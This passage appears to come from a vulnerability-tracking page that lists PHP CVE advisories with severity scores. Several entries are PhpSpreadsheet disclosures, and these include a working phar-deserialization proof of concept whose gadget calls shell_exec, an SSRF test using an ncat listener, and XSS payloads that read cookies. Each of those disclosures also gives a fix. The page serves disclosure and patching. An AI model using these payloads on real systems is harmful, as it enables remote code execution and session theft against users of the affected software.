resources before killing the process The attack requires no authentication - only the ability to upload or cause the application to process a crafted SpreadsheetML file. ## Recommended Fix Add MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`: ```php // After line 398: if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; if ($rowID > AddressRange::MAX_ROW) { $rowID = AddressRange::MAX_ROW; } } ``` Add the necessary import at the top of the file: ```php use PhpOffice\PhpSpreadsheet\Cell\AddressRange; ``` The same validation should also be applied to the `ss:Index` attribute on `<Cell>` elements (line 409) for the column dimension.

PHP Microsoft Denial Of Service
NVD GitHub
EPSS 0% CVSS 9.2
CRITICAL PATCH Act Now

The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

PHP Microsoft SSRF +1
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH POC This Week

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server.

PHP Code Injection RCE
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC This Week

XATABoost CMS 1.0.0 contains a union-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the id parameter. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

SQLi PHP
NVD Exploit-DB
EPSS 0% CVSS 2.1
LOW POC Monitor

A vulnerability was detected in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. This vulnerability affects unknown code of the file /index.php?action=register of the component Registration. The manipulation of the argument student_id/full_name/section/username results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used.

PHP XSS
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

A vulnerability was determined in SourceCodester Pizzafy Ecommerce System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/view_order.php of the component GET Parameter Handler. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

A vulnerability was found in SourceCodester Pizzafy Ecommerce System 1.0. Affected is the function save_menu of the file /admin/admin_class_novo.php of the component File Extension Handler. Performing a manipulation of the argument img results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made public and could be used.

PHP File Upload
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This impacts the function delete_supplier of the file /ajax.php?action=delete_supplier. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW Monitor

A vulnerability was detected in SourceCodester Pharmacy Sales and Inventory System 1.0. The impacted element is the function Customer of the file /index.php?page=customer. The manipulation of the argument Name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM This Month

A security vulnerability has been detected in EyouCMS up to 1.7.9. The affected element is the function GetSortData of the file application/common.php. The manipulation of the argument sort_asc leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

PHP SQLi
NVD VulDB
EPSS 0% CVSS 2.1
LOW POC Monitor

A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects the function save_supplier of the file /ajax.php?action=save_supplier. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

A weakness has been identified in EyouCMS up to 1.7.9. Impacted is the function editFile of the file application/admin/logic/FilemanagerLogic.php of the component Template File Handler. Executing a manipulation can lead to code injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

PHP Code Injection RCE
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in Cockpit CMS 2.13.5 and earlier allows authenticated users with low privileges to execute arbitrary PHP code on the server. Attackers exploit a filter bypass in the Bucket component's _isFileTypeAllowed function by crafting filenames that evade extension validation, then renaming files to .php for execution. Public proof-of-concept exists (SSVC: poc). EPSS data unavailable, but CVSS 8.8 with network vector and low attack complexity indicates high exploitability once authenticated.

PHP RCE File Upload
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

It was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes. ## The Problem In `Writer/Html.php` around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply `htmlspecialchars()`: ```php if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, ...); } ``` When a cell has a custom number format containing `@` (text placeholder) with any additional literal characters, the formatter replaces `@` with the cell value and adds the extra characters. This makes `$cellData !== $origData`, so `htmlspecialchars()` is **skipped entirely**. Even a single trailing space in the format (`@ `) is enough to bypass the escape. ## Proof of Concept ```php use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; use PhpOffice\PhpSpreadsheet\Cell\DataType; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // XSS payload with malicious number format $sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @'); $writer = new Html($spreadsheet); $writer->save('output.html'); ``` The generated HTML contains: ```html <td>. <img src=x onerror=alert(document.cookie)></td> ``` The XSS payload is **completely unescaped**. ## Tested Bypass Formats | Format Code | Result | Escaped? | |---|---|---| | `General` (default) | Original value | YES (safe) | | `. @` | `. ` + value | **NO (XSS!)** | | `@ ` (trailing space) | value + ` ` | **NO (XSS!)** | | `x@` | `x` + value | **NO (XSS!)** | This was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser. ## Impact Any application that: 1. Accepts uploaded XLSX files from users 2. Converts them to HTML using PhpSpreadsheet's HTML writer 3. Displays the HTML to other users ...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's `xl/styles.xml`. ## Suggested Fix Always apply `htmlspecialchars()` regardless of whether formatting changed the value: ```php // Instead of conditional escaping: $cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ``` Or escape AFTER formatting, not conditionally based on equality. ## Reporter Keyvan Hardani

PHP XSS
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

### Summary The HTML Writer in PhpSpreadsheet bypasses `htmlspecialchars()` output escaping when a cell uses a custom number format containing the `@` text placeholder with additional literal text (e.g., `@ "items"` or `"Total: "@`). This allows an attacker to inject arbitrary HTML and JavaScript into the generated HTML output by crafting a malicious XLSX file. ### Details #### 1. Conditional escaping in `Html.php:1586-1594` ```php $cellData = NumberFormat::toFormattedString( $origData2, $formatCode ?? NumberFormat::FORMAT_GENERAL, [$this, 'formatColor'] ); if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, Settings::htmlEntityFlags()); } ``` `htmlspecialchars()` is only called when `$cellData === $origData` (strict comparison). If the formatted output differs from the original value in any way, escaping is skipped entirely. #### 2. Early return in `Formatter.php:136-152` ```php if (preg_match(self::SECTION_SPLIT, $format) === 0 && preg_match(self::SYMBOL_AT, $formatx) === 1) { if (!str_contains($format, '"')) { return str_replace('@', /* raw value */, $format); } return str_replace(/* ... preg_replace with raw value ... */); } ``` When the format code contains `@` with additional literal text (e.g., `@ "items"`), the formatter substitutes the raw cell value into the format string and **returns early** - the `formatColor` callback (which would have applied `htmlspecialchars`) is never invoked. ### PoC **test.php** ``` php <?php require '/app/vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); $payload = '<img src=x onerror=alert(document.domain)>'; $formatCode = '@ "items"'; $sheet->setCellValue('A1', $payload); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode($formatCode); $writer = new Html($spreadsheet); $html = $writer->generateHTMLAll(); file_put_contents('/app/output.html', $html); echo "HTML output saved to /app/output.html\n"; ``` The produced output contains unescaped data. ``` html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="PhpSpreadsheet, https://github.com/PHPOffice/PhpSpreadsheet" /> <title>Untitled Spreadsheet</title> <meta name="author" content="Unknown Creator" /> <meta name="title" content="Untitled Spreadsheet" /> <meta name="lastModifiedBy" content="Unknown Creator" /> <meta name="created" content="2026-04-02T16:34:44+00:00" /> <meta name="modified" content="2026-04-02T16:34:44+00:00" /> <style type="text/css"> [..SNIP..] </style> </head> <body> <div style='page: page0'> <table border='0' cellpadding='0' cellspacing='0' id='sheet0' class='sheet0 gridlines'> <col class="col0" /> <tbody> <tr class="row0"> <td class="column0 style1 s"><img src=x onerror=alert(document.domain)> items</td> </tr> </tbody></table> </div> </body> </html> ``` <img width="719" height="716" alt="Screenshot 2026-04-02 at 18 45 53" src="https://github.com/user-attachments/assets/b758b063-a2d1-4e76-87bb-931eae81dbfe" /> ### Impact The impact changes based on the way the HTML is served. In case it is served from the web server it is typical XSS, in case the file is downloaded and opened locally, the attack vector is more limited.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 1.3
LOW PATCH Monitor

A vulnerability was found in Grav CMS up to 1.7.49.5/2.0.0-beta.1. Affected by this vulnerability is the function FileCache::doGet of the file system/src/Grav/Framework/Cache/Adapter/FileCache.php of the component Cache Value Handler. The manipulation results in deserialization. The attack may be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made public and could be used. Upgrading to version 2.0.0-beta.2 addresses this issue. The patch is identified as c66dfeb5f. The affected component should be upgraded.

PHP Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 1.9
LOW Monitor

A vulnerability was determined in SourceCodester Pizzafy Ecommerce System 1.0. This vulnerability affects the function save_user of the file /admin/ajax.php?action=save_user. Executing a manipulation of the argument Name can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 1.9
LOW Monitor

A vulnerability was found in SourceCodester Pizzafy Ecommerce System 1.0. This affects the function save_order of the file /admin/ajax.php?action=save_order. Performing a manipulation of the argument first_name results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

A reflected Cross-Site Scripting (XSS) vulnerability in School Management System by mahmoudai1 allows unauthenticated remote attackers to execute arbitrary JavaScript in victim's browsers via the unsanitized type parameter in register.php.

PHP XSS
NVD GitHub
EPSS 0% CVSS 1.9
LOW POC Monitor

A vulnerability has been found in SourceCodester Pizzafy Ecommerce System 1.0. Affected by this issue is the function save_menu of the file /admin/ajax.php?action=save_menu. Such manipulation of the argument Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

PHP XSS
NVD VulDB GitHub
EPSS 0% CVSS 1.9
LOW POC Monitor

Cross-site scripting (XSS) in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege administrators to inject malicious scripts via the Name parameter in the /admin/index.php?page=save_settings endpoint, exploited when an admin visits a crafted link. The vulnerability requires high privilege level (admin) and user interaction (UI:P), limiting but not eliminating real-world risk in environments with untrusted admins or admin account compromise. Publicly available exploit code exists.

PHP XSS
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in the delete_category function (/admin/ajax.php?action=delete_category). The vulnerability requires high-privilege authentication but enables limited confidentiality and integrity impact. Publicly available exploit code exists, elevating real-world risk despite the moderate CVSS score of 5.1.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW Monitor

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in the save_expired function of /ajax.php. The vulnerability affects an administrative interface endpoint and has publicly available exploit code. CVSS 5.1 reflects low confidentiality, integrity, and availability impact despite network accessibility due to high-privilege requirement (PR:H).

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 9.2
CRITICAL POC PATCH Act Now

Remote code execution in OpenCATS installer allows unauthenticated attackers to inject and execute arbitrary PHP code by manipulating the AJAX endpoint's databaseConnectivity action parameter. The injected code persists in config.php and executes on every page load while the installation wizard remains incomplete. Publicly available exploit code demonstrates breakout from define() string context using quote and statement separator techniques. Patch available via GitHub commit 3002a29, though CVSS AC:H (high complexity) suggests exploitation requires specific timing or environmental conditions during installation phase.

PHP Code Injection RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 2.0
LOW POC Monitor

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated high-privilege attackers to manipulate the ID parameter in the delete_expired function via /ajax.php?action=delete_expired, enabling remote database query manipulation with confidentiality, integrity, and availability impact. Publicly available exploit code exists and the vulnerability has been documented by VulDB.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 1.9
LOW Monitor

Reflected cross-site scripting in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers to inject malicious scripts via the ID parameter in /index.php?page=product, requiring user interaction to trigger payload execution. CVSS 4.8 with public exploit code availability (E:P) indicates low immediate risk despite network accessibility, constrained by high privilege requirement (PR:H) and user interaction dependency (UI:P).

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 1.9
LOW POC Monitor

Stored cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers with high privileges to inject malicious scripts via the Name parameter in the supplier management function (/index.php?page=supplier), affecting users who view the poisoned supplier records. The vulnerability requires user interaction (clicking a malicious link) and has CVSS 4.8 with publicly available proof-of-concept code, though it is limited to high-privileged users (PR:H) and causes only integrity impact (VI:L) without confidentiality or availability compromise.

PHP XSS
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the Name parameter in the save_category function at /admin/ajax.php. The vulnerability requires valid administrative credentials but poses moderate confidentiality, integrity, and availability risk. Publicly available exploit code exists and EPSS score of 0.84 indicates high exploitation probability despite the authentication gate.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 via the ID parameter in /view_prod.php allows authenticated remote attackers to execute arbitrary SQL queries with low complexity and no user interaction required. The vulnerability has a publicly available exploit and CVSS score of 6.3 reflecting moderate impact on confidentiality, integrity, and availability. Active exploitation is not yet confirmed in CISA KEV, but public proof-of-concept code exists.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the ID parameter in the save_order function at /admin/ajax.php?action=save_order, potentially enabling data exfiltration, modification, or deletion. Publicly available exploit code exists and the vulnerability carries a CVSS score of 6.3 with low complexity, indicating moderate real-world risk despite requiring login credentials.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to read, modify, or delete database contents through the ID parameter in the category function (pizza/index.php?page=category). The vulnerability has publicly available exploit code and requires valid user authentication to exploit, making it a moderate-risk issue suitable for immediate patching in production environments.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to manipulate the ID parameter in the get_cart_items AJAX function (/admin/ajax.php?action=get_cart_items) to execute arbitrary SQL queries and extract, modify, or delete database contents. The vulnerability has a CVSS score of 6.3 with publicly available exploit code, posing moderate risk to affected installations.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

Unrestricted file upload vulnerability in code-projects Online Music Site 1.0 allows authenticated high-privilege administrators to upload arbitrary files via the txtimage parameter in AdminUpdateAlbum.php, potentially leading to remote code execution. The vulnerability is network-accessible, has publicly available exploit code, and requires high-level administrative credentials to exploit, limiting attack surface primarily to insider threats or compromised admin accounts.

PHP File Upload
NVD VulDB GitHub
EPSS 0% CVSS 5.3
MEDIUM This Month

Booking Package plugin for WordPress up to version 1.7.06 allows unauthenticated attackers to manipulate booking prices via the intentForStripe() function, which accepts unsanitized $_POST['amount'] values and passes them directly to the Stripe PaymentIntent API without validation. The vulnerability is compounded by commented-out code in CreditCard.php that would normally enforce server-calculated pricing, enabling attackers to complete bookings at arbitrary prices (e.g., $0.01 instead of $500.00) with no authentication required. This is a confirmed price manipulation vulnerability with no active KEV exploitation reported but represents significant financial fraud risk.

PHP WordPress RCE
NVD
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in code-projects Coaching Management System 1.0 allows authenticated remote attackers to manipulate the complaintreply parameter in the POST handler at /cims/modules/admin/reply.php, leading to unauthorized database access and potential data exfiltration or modification. CVSS score of 6.3 reflects low confidentiality, integrity, and availability impact with network vector and low attack complexity. Public exploit code is available, and the vulnerability requires valid user authentication to trigger.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in the get_cart_count function at /admin/ajax.php. CVSS scores 7.3 (High) with network attack vector, low complexity, and no authentication required. Public exploit code exists on GitHub, significantly lowering the barrier to exploitation. EPSS data not available, but the combination of public exploit, low attack complexity (AC:L), and no authentication (PR:N) indicates moderate-to-high real-world risk for internet-facing installations.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to compromise database confidentiality, integrity, and availability via the email parameter in the admin login function. The vulnerability exists in /admin/ajax.php?action=login and has a publicly available proof-of-concept exploit on GitHub. With CVSS 7.3 (High) and confirmed POC, this represents an immediate risk to internet-exposed admin panels, though no active exploitation has been confirmed by CISA KEV at time of analysis.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to compromise database confidentiality, integrity, and availability through the login2 function. The vulnerability exists in /admin/ajax.php when processing the email parameter during administrative login, enabling attackers to bypass authentication, extract sensitive data, modify records, or disrupt service. A proof-of-concept exploit has been publicly released on GitHub, significantly lowering the barrier to exploitation. CVSS 7.3 (High) reflects network-accessible attack surface with no authentication required and low attack complexity.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in the delete_menu function of /admin/ajax.php. Public exploit code is available on GitHub, enabling database extraction, authentication bypass, and potential administrative access. CVSS 7.3 reflects network-accessible attack with no authentication required, though actual exploitation targets the administrative backend endpoint.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows unauthenticated remote attackers to extract, modify, or delete database contents via the ID parameter in /admin/ajax.php?action=delete_cart endpoint. Publicly available exploit code exists (GitHub POC), enabling immediate weaponization. CVSS 7.3 indicates network-based exploitation with no authentication barriers, granting partial confidentiality, integrity, and availability impact. Despite high CVSS and public POC, this affects a niche open-source e-commerce platform with limited deployment footprint.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

Stored cross-site scripting (XSS) in code-projects Coaching Management System 1.0 allows authenticated remote attackers to inject malicious scripts via the Complaint parameter in the complaint form page (/cims/modules/student/complaint.php), affecting users who view injected content. CVSS 5.1 reflects low confidentiality impact and limited integrity impact requiring user interaction; publicly available exploit code exists, confirming practical exploitability.

PHP XSS
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW Monitor

Reflected cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote attackers to inject malicious scripts via manipulation of the ID parameter in the /index.php?page=types endpoint. User interaction is required for exploitation, and publicly available exploit code exists, though the vulnerability carries limited impact (integrity only, no confidentiality or availability compromise) with a CVSS score of 5.3.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote unauthenticated attackers to execute arbitrary database queries via the ID parameter in /ajax.php?action=delete_product. Publicly available exploit code exists (GitHub POC), enabling unauthorized data access, modification, or deletion without authentication. EPSS data not available, but the combination of network attack vector, no authentication requirement, and public exploit significantly elevates real-world exploitation risk for internet-exposed instances.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

A weakness has been identified in SourceCodester Pharmacy Sales and Inventory System 1.0. This impacts an unknown function of the file /ajax.php?action=save_product. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.3
MEDIUM This Month

A weakness has been identified in mettle sendportal up to 3.0.1. Affected is the function destroy of the file app/Http/Controllers/Workspaces/WorkspaceInvitationsController.php of the component Invitation Handler. This manipulation of the argument invitation causes authorization bypass. The attack may be initiated remotely. The project was informed of the problem early through an issue report but has not responded yet.

PHP Authentication Bypass
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

A security flaw has been discovered in 1000 Projects Portfolio Management System MCA 1.0. This impacts an unknown function of the file update_passwd_process.php. The manipulation of the argument temp_user results in authorization bypass. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks.

PHP Authentication Bypass
NVD VulDB GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/selectindices.php via the namecontains parameter

PHP XSS
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter

PHP XSS
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php

PHP CSRF
NVD GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

A vulnerability was identified in 1000 Projects Portfolio Management System MCA up to 1.0. This affects an unknown function of the file /admin/block_status.php. The manipulation of the argument q leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.1
MEDIUM POC This Month

ProjeQtor versions 7.0 through 12.4.3 contain a stored cross-site scripting vulnerability in the checkValidHtmlText() function within Security.php that fails to properly sanitize user input by only detecting specific patterns while returning unsanitized strings without output encoding. Attackers can inject malicious payloads that bypass the filter using alternative syntax such as img tags with event handlers, which are stored and executed in the browsers of users viewing the affected content.

PHP XSS
NVD
EPSS 0% CVSS 7.1
HIGH POC This Week

ProjeQtor versions 7.0 through 12.4.3 contains a path traversal vulnerability in the log file viewer at dynamicDialog.php where the logname parameter is not validated against directory traversal sequences before constructing file paths. Authenticated attackers can inject directory traversal sequences ../ into the logname parameter to read arbitrary .log files accessible to the web server process on the filesystem.

PHP Path Traversal
NVD
EPSS 0% CVSS 7.1
HIGH POC This Week

ProjeQtor versions 7.0 through 12.4.3 contain a missing authorization vulnerability in the objectDetail.php endpoint that allows authenticated users with guest-level privileges to retrieve sensitive data belonging to other users including password hashes and API keys. Attackers can bypass access controls by directly accessing the endpoint without ownership or role-based validation to extract administrator credentials and perform privilege escalation.

PHP Information Disclosure Authentication Bypass +1
NVD
EPSS 0% CVSS 8.7
HIGH POC This Week

ProjeQtor versions 7.0 through 12.4.3 contain a ZipSlip path traversal vulnerability in the plugin upload functionality that allows authenticated attackers with upload permissions to write files outside the intended extraction directory by crafting ZIP archives with directory traversal sequences. Attackers can exploit unvalidated archive extraction to write a PHP webshell to a web-accessible directory and achieve remote code execution with the privileges of the web server process.

RCE PHP Path Traversal
NVD
EPSS 0% CVSS 2.0
LOW POC Monitor

A vulnerability was identified in code-projects Online Lot Reservation System 1.0. Affected is an unknown function of the file /edithousepic.php. Such manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit is publicly available and might be used.

PHP File Upload
NVD VulDB GitHub
EPSS 0% CVSS 2.0
LOW POC Monitor

A vulnerability was determined in code-projects Online Lot Reservation System 1.0. This impacts an unknown function of the file /activity.php. This manipulation of the argument directory causes unrestricted upload. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized.

PHP File Upload
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

A vulnerability was found in code-projects Online Lot Reservation System up to 1.0. This affects the function readfile of the file /download.php. The manipulation of the argument File results in path traversal. It is possible to launch the attack remotely. The exploit has been made public and could be used.

PHP Path Traversal
NVD VulDB GitHub
EPSS 0% CVSS 5.5
